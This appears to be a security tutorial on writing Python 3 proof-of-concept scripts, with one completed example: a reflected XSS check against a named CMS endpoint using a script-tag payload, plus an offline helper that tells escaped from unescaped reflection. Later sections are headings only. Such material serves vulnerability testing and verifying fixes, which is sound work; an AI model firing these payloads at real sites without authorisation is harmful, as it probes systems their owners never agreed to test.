Writing PoCs for different vulnerability types in Python 3

The modules used by Python 2 and Python 3 differ slightly (Python 2's urllib2 becomes urllib.request in Python 3).

1. Reflected XSS PoC, using the reflected XSS in 骑士cms as the example

# coding=utf-8
# Reflected XSS PoC for 骑士cms (Python 3: urllib.request; Python 2 used urllib2)
from urllib import request
import sys
# https://blog.csdn.net/jiduochou963/article/details/87564467
# http://www.onescorpion.com/research/poc.html

# Marker the vulnerable page reflects verbatim; it is the URL-decoded form of
# %3Cscript%3Ealert(1)%3C/script%3E in the query string below. (The original
# check compared against an empty string, which matches every response.)
MARKER = b'<script>alert(1)</script>'

def xss_poc(url):
    target = url + r"/Product.asp?BigClassName=%C4%A5%BB%FA%3Cscript%3Ealert(1)%3C/script%3E&Smallclassname=%C1%A2%C4%A5"
    try:
        req = request.Request(target)  # build the request
        result = request.urlopen(req).read()  # response body as bytes
        if MARKER in result:  # marker reflected without encoding
            print("%s is vulnerable!" % url)
            print("payload:\n", target)
        else:
            print("%s is not vulnerable!" % url)
    except Exception as e:
        print('something is wrong..')
        print(e)

if __name__ == '__main__':
    argvs = sys.argv
    if len(argvs) == 2:
        xss_poc(argvs[1])
    else:
        print('usage: python %s url' % argvs[0])
        sys.exit(1)

PoC verification result:
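As an added example (not from the original post or from 骑士cms), the PoC's "is the marker reflected?" decision pulled out into a function that runs offline against constructed response bodies, so it can be unit-tested and reused to confirm that a patched page now HTML-escapes the parameter. The page charset and the sample bodies are assumptions.

```python
# Added example, not from the original post: the PoC above decides "vulnerable"
# by looking for the reflected marker in the response body. This runs the same
# decision offline against constructed bodies and also recognises the fixed
# case, where the marker comes back HTML-entity encoded.
import html
from urllib.parse import unquote

# The marker the PoC sends, i.e. the decoded form of %3Cscript%3Ealert(1)%3C/script%3E
MARKER = "<script>alert(1)</script>"


def decode_query_value(encoded):
    """Percent-decode a query value the way the server sees it."""
    return unquote(encoded)


def classify_reflection(marker, body, encoding="utf-8"):
    """Report how `marker` appears in a response body.

    'unescaped' - reflected verbatim (what the PoC reports as vulnerable)
    'escaped'   - reflected but HTML-entity encoded (output encoding in place)
    'absent'    - not reflected at all
    `body` may be bytes (as urlopen().read() returns) or str. `encoding` is
    the page charset and is an assumption here; pass the CMS page's real one.
    """
    if isinstance(body, bytes):
        body = body.decode(encoding, errors="replace")
    if marker in body:
        return "unescaped"
    if html.escape(marker) in body:
        return "escaped"
    return "absent"


# Constructed sample bodies; not captured from any real site.
VULNERABLE_BODY = b"<title>Product: <script>alert(1)</script></title>"
FIXED_BODY = "<title>Product: &lt;script&gt;alert(1)&lt;/script&gt;</title>"
UNRELATED_BODY = "<title>Product list</title>"

if __name__ == "__main__":
    for name, body in [("vulnerable", VULNERABLE_BODY), ("fixed", FIXED_BODY),
                       ("unrelated", UNRELATED_BODY)]:
        print(name, "->", classify_reflection(MARKER, body))
```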

2. Stored XSS PoC

3. GET-based SQL injection

4. POST-based SQL injection

5. Code execution

6. File upload
